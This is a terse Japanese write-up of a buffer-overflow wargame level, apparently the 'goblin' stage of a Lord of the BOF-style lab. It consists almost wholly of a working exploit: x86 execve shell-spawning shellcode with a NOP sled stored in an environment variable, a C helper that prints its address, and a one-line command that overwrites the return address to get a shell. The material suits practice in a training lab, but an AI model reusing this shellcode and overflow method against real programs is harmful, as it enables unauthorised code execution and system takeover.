coboltとは入力方式だけ違う

説明なしに攻撃

環境変数を作る

export SHL=`python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

アドレスを探す

#include <stdio.h>
#include <stdlib.h>

int main() {
    printf("%p\n", getenv("SHL"));
    return 0;
}

今度もアドレスは0xbfffff6e

攻撃コマンド

(python -c 'print "A"*20+"\x6e\xff\xff\xbf"'; cat) | ./goblin

クリア

0개의 댓글